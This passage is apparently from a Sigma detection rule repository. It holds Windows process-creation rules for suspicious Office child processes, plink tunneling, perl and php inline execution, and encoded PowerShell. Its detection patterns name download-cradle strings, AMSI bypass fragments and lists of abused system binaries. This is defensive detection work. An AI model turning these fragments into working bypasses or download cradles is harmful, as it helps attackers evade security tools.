CommandLine|contains|all:\n            #     - 'shell32.dll,Control_RunDLL'\n            #     - '\\SYSTEM32\\SPOOL\\DRIVERS\\'\n    condition: selection # and not 1 of filter*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml",
    "content": "title: Suspicious Remote Child Process From Outlook\nid: e212d415-0e93-435f-9e1a-f29005bb4723\nrelated:\n    - id: 208748f7-881d-47ac-a29c-07ea84bf691d # Outlook Child Processes\n      type: similar\nstatus: test\ndescription: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).\nreferences:\n    - https://github.com/sensepost/ruler\n    - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49\nauthor: Markus Neis, Nasreddine Bencherchali (Nextron Systems)\ndate: 2018-12-27\nmodified: 2023-02-09\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\outlook.exe'\n        Image|startswith: '\\\\\\\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml",
    "content": "title: Suspicious Binary In User Directory Spawned From Office Application\nid: aa3a6f94-890e-4e22-b634-ffdfd54792cc\nstatus: test\ndescription: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)\nreferences:\n    - https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign\n    - https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57\nauthor: Jason Lynch\ndate: 2019-04-02\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - attack.g0046\n    - car.2013-05-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\WINWORD.EXE'\n            - '\\EXCEL.EXE'\n            - '\\POWERPNT.exe'\n            - '\\MSPUB.exe'\n            - '\\VISIO.exe'\n            - '\\MSACCESS.exe'\n            - '\\EQNEDT32.exe'\n            # - '\\OUTLOOK.EXE' too many FPs\n        Image|startswith: 'C:\\users\\'\n        Image|endswith: '.exe'\n    filter:\n        Image|endswith: '\\Teams.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml",
    "content": "title: Suspicious Microsoft Office Child Process\nid: 438025f9-5856-4663-83f7-52f878a70a50\nrelated:\n    - id: c27515df-97a9-4162-8a60-dc0eeb51b775 # Speicifc OneNote rule due to its recent usage in phishing attacks\n      type: derived\n    - id: e1693bc8-7168-4eab-8718-cdcaa68a1738\n      type: derived\n    - id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8\n      type: obsolete\n    - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a\n      type: obsolete\n    - id: 04f5363a-6bca-42ff-be70-0d28bf629ead\n      type: obsolete\nstatus: test\ndescription: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)\nreferences:\n    - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100\n    - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\n    - https://github.com/splunk/security_content/blob/300af51b88ad5d5b27ce4f5f54e4d6e6a3a2c06d/detections/endpoint/office_spawning_control.yml\n    - https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A\n    - https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set\n    - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n    - https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html\n    - https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/\nauthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io\ndate: 2018-04-06\nmodified: 2023-04-24\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1047\n    - attack.t1204.002\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\EQNEDT32.EXE'\n            - '\\EXCEL.EXE'\n            - '\\MSACCESS.EXE'\n            - '\\MSPUB.exe'\n            - '\\ONENOTE.EXE'\n            - '\\POWERPNT.exe'\n            - '\\VISIO.exe'\n            - '\\WINWORD.EXE'\n            - '\\wordpad.exe'\n            - '\\wordview.exe'\n    selection_child_processes:\n        - OriginalFileName:\n              - 'bitsadmin.exe'\n              - 'CertOC.exe'\n              - 'CertUtil.exe'\n              - 'Cmd.Exe'\n              - 'CMSTP.EXE'\n              - 'cscript.exe'\n              - 'curl.exe'\n              - 'HH.exe'\n              - 'IEExec.exe'\n              - 'InstallUtil.exe'\n              - 'javaw.exe'\n              - 'Microsoft.Workflow.Compiler.exe'\n              - 'msdt.exe'\n              - 'MSHTA.EXE'\n              - 'msiexec.exe'\n              - 'Msxsl.exe'\n              - 'odbcconf.exe'\n              - 'pcalua.exe'\n              - 'PowerShell.EXE'\n              - 'RegAsm.exe'\n              - 'RegSvcs.exe'\n              - 'REGSVR32.exe'\n              - 'RUNDLL32.exe'\n              - 'schtasks.exe'\n              - 'ScriptRunner.exe'\n              - 'wmic.exe'\n              - 'WorkFolders.exe'\n              - 'wscript.exe'\n        - Image|endswith:\n              - '\\AppVLP.exe'\n              - '\\bash.exe'\n              - '\\bitsadmin.exe'\n              - '\\certoc.exe'\n              - '\\certutil.exe'\n              - '\\cmd.exe'\n              - '\\cmstp.exe'\n              - '\\control.exe'\n              - '\\cscript.exe'\n              - '\\curl.exe'\n              - '\\forfiles.exe'\n              - '\\hh.exe'\n              - '\\ieexec.exe'\n              - '\\installutil.exe'\n              - '\\javaw.exe'\n              - '\\mftrace.exe'\n              - '\\Microsoft.Workflow.Compiler.exe'\n              - '\\msbuild.exe'\n              - '\\msdt.exe'\n              - '\\mshta.exe'\n              - '\\msidb.exe'\n              - '\\msiexec.exe'\n              - '\\msxsl.exe'\n              - '\\odbcconf.exe'\n              - '\\pcalua.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regasm.exe'\n              - '\\regsvcs.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\schtasks.exe'\n              - '\\scrcons.exe'\n              - '\\scriptrunner.exe'\n              - '\\sh.exe'\n              - '\\svchost.exe'\n              - '\\verclsid.exe'\n              - '\\wmic.exe'\n              - '\\workfolders.exe'\n              - '\\wscript.exe'\n    selection_child_susp_paths: # Idea: Laiali Kazalbach, Mohamed Elsayed (#4142)\n        Image|contains:\n            - '\\AppData\\'\n            - '\\Users\\Public\\'\n            - '\\ProgramData\\'\n            - '\\Windows\\Tasks\\'\n            - '\\Windows\\Temp\\'\n            - '\\Windows\\System32\\Tasks\\'\n    condition: selection_parent and 1 of selection_child_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_office_winword_dll_load.yml",
    "content": "title: Potential Arbitrary DLL Load Using Winword\nid: f7375e28-5c14-432f-b8d1-1db26c832df3\nrelated:\n    - id: 2621b3a6-3840-4810-ac14-a02426086171\n      type: obsolete\nstatus: test\ndescription: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.\nreferences:\n    - https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py\nauthor: Victor Sergeev, oscd.community\ndate: 2020-10-09\nmodified: 2023-03-29\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WINWORD.exe'\n        - OriginalFileName: 'WinWord.exe'\n    selection_dll:\n        CommandLine|contains|all:\n            - '/l '\n            - '.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml",
    "content": "title: Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution\nid: 02b18447-ea83-4b1b-8805-714a8a34546a\nstatus: test\ndescription: |\n    Detects execution of Windows Defender \"OfflineScannerShell.exe\" from its non standard directory.\n    The \"OfflineScannerShell.exe\" binary is vulnerable to DLL side loading and will load any DLL named \"mpclient.dll\" from the current working directory.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/\nauthor: frack113\ndate: 2022-03-06\nmodified: 2023-08-03\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\OfflineScannerShell.exe'\n        - OriginalFileName: 'OfflineScannerShell.exe'\n    filter_main_legit_dir:\n        CurrentDirectory: 'C:\\Program Files\\Windows Defender\\Offline\\'\n    filter_main_empty:\n        CurrentDirectory: ''\n    filter_main_null:\n        CurrentDirectory: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pdqdeploy_execution.yml",
    "content": "title: PDQ Deploy Remote Adminstartion Tool Execution\nid: d679950c-abb7-43a6-80fb-2a480c4fc450\nrelated:\n    - id: 12b8e9f5-96b2-41e1-9a42-8c6779a5c184\n      type: similar\nstatus: test\ndescription: Detect use of PDQ Deploy remote admin tool\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md\n    - https://www.pdq.com/pdq-deploy/\nauthor: frack113\ndate: 2022-10-01\nmodified: 2023-01-30\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1072\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: PDQ Deploy Console\n        - Product: PDQ Deploy\n        - Company: PDQ.com\n        - OriginalFileName: PDQDeployConsole.exe\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml",
    "content": "title: Potentially Suspicious Execution Of PDQDeployRunner\nid: 12b8e9f5-96b2-41e1-9a42-8c6779a5c184\nrelated:\n    - id: d679950c-abb7-43a6-80fb-2a480c4fc450\n      type: similar\nstatus: test\ndescription: Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines\nreferences:\n    - https://twitter.com/malmoeb/status/1550483085472432128\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-22\nmodified: 2024-05-02\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|contains: '\\PDQDeployRunner-'\n    selection_child:\n        # Improve this section by adding other suspicious processes, commandlines or paths\n        - Image|endswith:\n              # If you use any of the following processes legitimately comment them out\n              - '\\bash.exe'\n              - '\\certutil.exe'\n              - '\\cmd.exe'\n              - '\\csc.exe'\n              - '\\cscript.exe'\n              - '\\dllhost.exe'\n              - '\\mshta.exe'\n              - '\\msiexec.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\scriptrunner.exe'\n              - '\\wmic.exe'\n              - '\\wscript.exe'\n              - '\\wsl.exe'\n        - Image|contains:\n              - ':\\ProgramData\\'\n              - ':\\Users\\Public\\'\n              - ':\\Windows\\TEMP\\'\n              - '\\AppData\\Local\\Temp'\n        - CommandLine|contains:\n              - ' -decode '\n              - ' -enc '\n              - ' -encodedcommand '\n              - ' -w hidden'\n              - 'DownloadString'\n              - 'FromBase64String'\n              - 'http'\n              - 'iex '\n              - 'Invoke-'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the PDQDeploy tool to execute these commands\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml",
    "content": "title: Perl Inline Command Execution\nid: f426547a-e0f7-441a-b63e-854ac5bdf54d\nstatus: test\ndescription: Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\perl.exe'\n        - OriginalFileName: 'perl.exe' # Also covers perlX.XX.exe\n    selection_cli:\n        CommandLine|contains: ' -e'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml",
    "content": "title: Php Inline Command Execution\nid: d81871ef-5738-47ab-9797-7a9c90cd4bfb\nstatus: test\ndescription: Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.\nreferences:\n    - https://www.php.net/manual/en/features.commandline.php\n    - https://www.revshells.com/\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\php.exe'\n        - OriginalFileName: 'php.exe'\n    selection_cli:\n        CommandLine|contains: ' -r'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ping_hex_ip.yml",
    "content": "title: Ping Hex IP\nid: 1a0d4aba-7668-4365-9ce4-6d79ab088dfd\nstatus: test\ndescription: Detects a ping command that uses a hex encoded IP address\nreferences:\n    - https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna\n    - https://twitter.com/vysecurity/status/977198418354491392\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-03-23\nmodified: 2025-10-17\ntags:\n    - attack.defense-evasion\n    - attack.t1140\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ping.exe'\n        CommandLine|re: '0x[a-fA-F0-9]{8}'\n    condition: selection\nfalsepositives:\n    - Unlikely, because no sane admin pings IP addresses in a hexadecimal form\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pktmon_execution.yml",
    "content": "title: PktMon.EXE Execution\nid: f956c7c1-0f60-4bc5-b7d7-b39ab3c08908\nstatus: test\ndescription: Detects execution of PktMon, a tool that captures network packets.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Pktmon/\nauthor: frack113\ndate: 2022-03-17\nmodified: 2023-06-23\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1040\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\pktmon.exe'\n        - OriginalFileName: 'PktMon.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_plink_port_forwarding.yml",
    "content": "title: Suspicious Plink Port Forwarding\nid: 48a61b29-389f-4032-b317-b30de6b95314\nstatus: test\ndescription: Detects suspicious Plink tunnel port forwarding to a local port\nreferences:\n    - https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/\n    - https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-19\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1572\n    - attack.lateral-movement\n    - attack.t1021.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Description: 'Command-line SSH, Telnet, and Rlogin client'\n        CommandLine|contains: ' -R '\n    condition: selection\nfalsepositives:\n    - Administrative activity using a remote port forwarding to a local port\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_plink_susp_tunneling.yml",
    "content": "title: Potential RDP Tunneling Via Plink\nid: f38ce0b9-5e97-4b47-a211-7dc8d8b871da\nrelated:\n    - id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d # ssh.exe\n      type: similar\nstatus: test\ndescription: Execution of plink to perform data exfiltration and tunneling\nreferences:\n    - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-04\nmodified: 2023-01-27\ntags:\n    - attack.command-and-control\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_a:\n        Image|endswith: '\\plink.exe'\n        CommandLine|contains: ':127.0.0.1:3389'\n    selection_b1:\n        Image|endswith: '\\plink.exe'\n        CommandLine|contains: ':3389'\n    selection_b2:\n        CommandLine|contains:\n            - ' -P 443'\n            - ' -P 22'\n    condition: selection_a or all of selection_b*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powercfg_execution.yml",
    "content": "title: Suspicious Powercfg Execution To Change Lock Screen Timeout\nid: f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b\nstatus: test\ndescription: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout\nreferences:\n    - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\n    - https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options\nauthor: frack113\ndate: 2022-11-18\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_power:\n        - Image|endswith: '\\powercfg.exe'\n        - OriginalFileName: 'PowerCfg.exe'\n    selection_standby:\n        # powercfg.exe /SETACVALUEINDEX SCHEME_CURRENT SUB_VIDEO VIDEOCONLOCK\n        - CommandLine|contains|all:\n              - '/setacvalueindex '\n              - 'SCHEME_CURRENT'\n              - 'SUB_VIDEO'\n              - 'VIDEOCONLOCK'\n        # powercfg -change -standby-timeout-dc 3000\n        # powercfg -change -standby-timeout-ac 3000\n        - CommandLine|contains|all:\n              - '-change '\n              - '-standby-timeout-'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml",
    "content": "title: AADInternals PowerShell Cmdlets Execution - ProccessCreation\nid: c86500e9-a645-4680-98d7-f882c70c1ea3\nrelated:\n    - id: 91e69562-2426-42ce-a647-711b8152ced6\n      type: similar\nstatus: test\ndescription: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.\nreferences:\n    - https://o365blog.com/aadinternals/\n    - https://github.com/Gerenios/AADInternals\nauthor: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2022-12-23\nmodified: 2025-02-06\ntags:\n    - attack.execution\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.credential-access\n    - attack.impact\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\powershell_ise.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.Exe'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains:\n            # Since most of the cmdlets use a unique enough string which is \"-AADInt\" we only used that portion. For a complete list please check the references linked above\n            - 'Add-AADInt'\n            - 'ConvertTo-AADInt'\n            - 'Disable-AADInt'\n            - 'Enable-AADInt'\n            - 'Export-AADInt'\n            - 'Find-AADInt'\n            - 'Get-AADInt'\n            - 'Grant-AADInt'\n            - 'Initialize-AADInt'\n            - 'Install-AADInt'\n            - 'Invoke-AADInt'\n            - 'Join-AADInt'\n            - 'New-AADInt'\n            - 'Open-AADInt'\n            - 'Read-AADInt'\n            - 'Register-AADInt'\n            - 'Remove-AADInt'\n            - 'Reset-AADInt'\n            - 'Resolve-AADInt'\n            - 'Restore-AADInt'\n            - 'Save-AADInt'\n            - 'Search-AADInt'\n            - 'Send-AADInt'\n            - 'Set-AADInt'\n            - 'Start-AADInt'\n            - 'Unprotect-AADInt'\n            - 'Update-AADInt'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the library for administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml",
    "content": "title: Potential Active Directory Enumeration Using AD Module - ProcCreation\nid: 70bc5215-526f-4477-963c-a47a5c9ebd12\nrelated:\n    - id: 9e620995-f2d8-4630-8430-4afd89f77604\n      type: similar\n    - id: 74176142-4684-4d8a-8b0a-713257e7df8e\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.\nreferences:\n    - https://github.com/samratashok/ADModule\n    - https://twitter.com/cyb3rops/status/1617108657166061568?s=20\n    - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges\nauthor: frack113\ndate: 2023-01-22\ntags:\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.impact\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cmdlet:\n        CommandLine|contains:\n            - 'Import-Module '\n            - 'ipmo '\n    selection_dll:\n        CommandLine|contains: 'Microsoft.ActiveDirectory.Management.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the library for administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml",
    "content": "title: Add Windows Capability Via PowerShell Cmdlet\nid: b36d01a3-ddaf-4804-be18-18a6247adfcd\nrelated:\n    - id: 155c7fd5-47b4-49b2-bbeb-eb4fab335429\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Add-WindowsCapability\" cmdlet to add Windows capabilities. Notable capabilities could be \"OpenSSH\" and others.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell\n    - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-22\nmodified: 2023-05-09\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cmdlet:\n        CommandLine|contains: 'Add-WindowsCapability'\n    selection_capa:\n        CommandLine|contains: 'OpenSSH.' # For both \"OpenSSH.Server\" and \"OpenSSH.Client\"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml",
    "content": "title: Potential AMSI Bypass Via .NET Reflection\nid: 30edb182-aa75-42c0-b0a9-e998bb29067c\nrelated:\n    - id: 4f927692-68b5-4267-871b-073c45f4f6fe\n      type: obsolete\nstatus: test\ndescription: Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning\nreferences:\n    - https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/\n    - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\nauthor: Markus Neis, @Kostastsale\ndate: 2018-08-17\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains|all:\n              - 'System.Management.Automation.AmsiUtils'\n              - 'amsiInitFailed'\n        - CommandLine|contains|all:\n              - '[Ref].Assembly.GetType'\n              - 'SetValue($null,$true)'\n              - 'NonPublic,Static'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml",
    "content": "title: Potential AMSI Bypass Using NULL Bits\nid: 92a974db-ab84-457f-9ec0-55db83d7a825\nrelated:\n    - id: fa2559c8-1197-471d-9cdd-05a0273d4522\n      type: similar\nstatus: test\ndescription: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities\nreferences:\n    - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-04\nmodified: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - \"if(0){{{0}}}' -f $(0 -as [char]) +\"\n            - \"#<NULL>\"\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml",
    "content": "title: Audio Capture via PowerShell\nid: 932fb0d8-692b-4b0f-a26e-5643a50fe7d6\nstatus: test\ndescription: Detects audio capture via PowerShell Cmdlet.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html\n    - https://github.com/frgnca/AudioDeviceCmdlets\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-24\nmodified: 2023-04-06\ntags:\n    - attack.collection\n    - attack.t1123\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'WindowsAudioDevice-Powershell-Cmdlet'\n            - 'Toggle-AudioDevice'\n            - 'Get-AudioDevice '\n            - 'Set-AudioDevice '\n            - 'Write-AudioDevice '\n    condition: selection\nfalsepositives:\n    - Legitimate audio capture by legitimate user.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml",
    "content": "title: Suspicious Encoded PowerShell Command Line\nid: ca2092a1-c273-4878-9b4b-0d60115bf5ea\nstatus: test\ndescription: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)\nreferences:\n    - https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e\nauthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community\ndate: 2018-09-03\nmodified: 2023-04-06\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli_enc:\n        CommandLine|contains: ' -e' # covers -en and -enc\n    selection_cli_content:\n        CommandLine|contains:\n            - ' JAB'\n            - ' SUVYI'\n            - ' SQBFAFgA'\n            - ' aQBlAHgA'\n            - ' aWV4I'\n            - ' IAA'\n            - ' IAB'\n            - ' UwB'\n            - ' cwB'\n    selection_standalone:\n        CommandLine|contains:\n            - '.exe -ENCOD '\n            - ' BA^J e-' # Reversed\n    filter_optional_remote_signed:\n        CommandLine|contains: ' -ExecutionPolicy remotesigned '\n    condition: selection_img and (all of selection_cli_* or selection_standalone) and not 1 of filter_optional_*\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd_patterns.yml",
